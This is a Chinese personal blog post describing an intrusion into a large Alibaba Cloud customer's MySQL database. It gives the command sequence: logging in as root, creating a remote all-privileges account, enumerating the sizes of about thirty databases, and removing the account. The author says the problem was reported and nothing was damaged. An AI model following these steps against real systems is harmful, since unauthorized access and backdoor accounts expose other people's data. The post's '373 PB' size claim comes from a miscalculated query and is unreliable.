个人笔记,  安全性测试相关,  测试

记一次入侵阿里云某巨型客户后台mysql库-20170806


mysql 管理 root/passwd[不便公开]
http://ip:9002/index.php?db  【ip不便公开】

mysql -u root -p -h ip
use mysql;
grant all on *.* to test@'%' identified by 'test@test';

flush privileges
exit;
mysql -u test -p -h ip

SELECT sum(DATA_LENGTH)+sum(INDEX_LENGTH)/1073741824 as 'GB' FROM information_schema.TABLES where TABLE_SCHEMA='information_schema';
SELECT sum(DATA_LENGTH)+sum(INDEX_LENGTH)/1073741824 as 'GB' FROM information_schema.TABLES where TABLE_SCHEMA='bmnhg';             
SELECT sum(DATA_LENGTH)+sum(INDEX_LENGTH)/1073741824 as 'GB' FROM information_schema.TABLES where TABLE_SCHEMA='cms';               
SELECT sum(DATA_LENGTH)+sum(INDEX_LENGTH)/1073741824 as 'GB' FROM information_schema.TABLES where TABLE_SCHEMA='cmwx';              
SELECT sum(DATA_LENGTH)+sum(INDEX_LENGTH)/1073741824 as 'GB' FROM information_schema.TABLES where TABLE_SCHEMA='db';                
SELECT sum(DATA_LENGTH)+sum(INDEX_LENGTH)/1073741824 as 'GB' FROM information_schema.TABLES where TABLE_SCHEMA='dede_fc';           
SELECT sum(DATA_LENGTH)+sum(INDEX_LENGTH)/1073741824 as 'GB' FROM information_schema.TABLES where TABLE_SCHEMA='dedecmsv57utf8sp1'; 
SELECT sum(DATA_LENGTH)+sum(INDEX_LENGTH)/1073741824 as 'GB' FROM information_schema.TABLES where TABLE_SCHEMA='diy_lanrenmb';      
SELECT sum(DATA_LENGTH)+sum(INDEX_LENGTH)/1073741824 as 'GB' FROM information_schema.TABLES where TABLE_SCHEMA='fc_dede';         
SELECT sum(DATA_LENGTH)+sum(INDEX_LENGTH)/1073741824 as 'GB' FROM information_schema.TABLES where TABLE_SCHEMA='hk';                
SELECT sum(DATA_LENGTH)+sum(INDEX_LENGTH)/1073741824 as 'GB' FROM information_schema.TABLES where TABLE_SCHEMA='jcjfr';             
SELECT sum(DATA_LENGTH)+sum(INDEX_LENGTH)/1073741824 as 'GB' FROM information_schema.TABLES where TABLE_SCHEMA='jf_oms';           
SELECT sum(DATA_LENGTH)+sum(INDEX_LENGTH)/1073741824 as 'GB' FROM information_schema.TABLES where TABLE_SCHEMA='jfce';            
SELECT sum(DATA_LENGTH)+sum(INDEX_LENGTH)/1073741824 as 'GB' FROM information_schema.TABLES where TABLE_SCHEMA='jfcrm';             
SELECT sum(DATA_LENGTH)+sum(INDEX_LENGTH)/1073741824 as 'GB' FROM information_schema.TABLES where TABLE_SCHEMA='jfsr';              
SELECT sum(DATA_LENGTH)+sum(INDEX_LENGTH)/1073741824 as 'GB' FROM information_schema.TABLES where TABLE_SCHEMA='jfxd';              
SELECT sum(DATA_LENGTH)+sum(INDEX_LENGTH)/1073741824 as 'GB' FROM information_schema.TABLES where TABLE_SCHEMA='jfyxj';             
SELECT sum(DATA_LENGTH)+sum(INDEX_LENGTH)/1073741824 as 'GB' FROM information_schema.TABLES where TABLE_SCHEMA='jfzp';              
SELECT sum(DATA_LENGTH)+sum(INDEX_LENGTH)/1073741824 as 'GB' FROM information_schema.TABLES where TABLE_SCHEMA='jyscms';            
SELECT sum(DATA_LENGTH)+sum(INDEX_LENGTH)/1073741824 as 'GB' FROM information_schema.TABLES where TABLE_SCHEMA='jzl';               
SELECT sum(DATA_LENGTH)+sum(INDEX_LENGTH)/1073741824 as 'GB' FROM information_schema.TABLES where TABLE_SCHEMA='kh';                
SELECT sum(DATA_LENGTH)+sum(INDEX_LENGTH)/1073741824 as 'GB' FROM information_schema.TABLES where TABLE_SCHEMA='lianxi';            
SELECT sum(DATA_LENGTH)+sum(INDEX_LENGTH)/1073741824 as 'GB' FROM information_schema.TABLES where TABLE_SCHEMA='mag';              
SELECT sum(DATA_LENGTH)+sum(INDEX_LENGTH)/1073741824 as 'GB' FROM information_schema.TABLES where TABLE_SCHEMA='mysql';         
SELECT sum(DATA_LENGTH)+sum(INDEX_LENGTH)/1073741824 as 'GB' FROM information_schema.TABLES where TABLE_SCHEMA='shijie';            
SELECT sum(DATA_LENGTH)+sum(INDEX_LENGTH)/1073741824 as 'GB' FROM information_schema.TABLES where TABLE_SCHEMA='test';              
SELECT sum(DATA_LENGTH)+sum(INDEX_LENGTH)/1073741824 as 'GB' FROM information_schema.TABLES where TABLE_SCHEMA='ultrax';            
SELECT sum(DATA_LENGTH)+sum(INDEX_LENGTH)/1073741824 as 'GB' FROM information_schema.TABLES where TABLE_SCHEMA='wx';                
SELECT sum(DATA_LENGTH)+sum(INDEX_LENGTH)/1073741824 as 'GB' FROM information_schema.TABLES where TABLE_SCHEMA='wxzz ';    

delete from user where user='test';
privileges;
exit;
数据量惊人这个库jfcrm 382411776.0398 GB= 373449TB~373 PB
通过ip查询是阿里云
未做任何的破坏性操作。 当晚与阿里客服沟通上报问题 与处理。

留言

您的邮箱地址不会被公开。 必填项已用 * 标注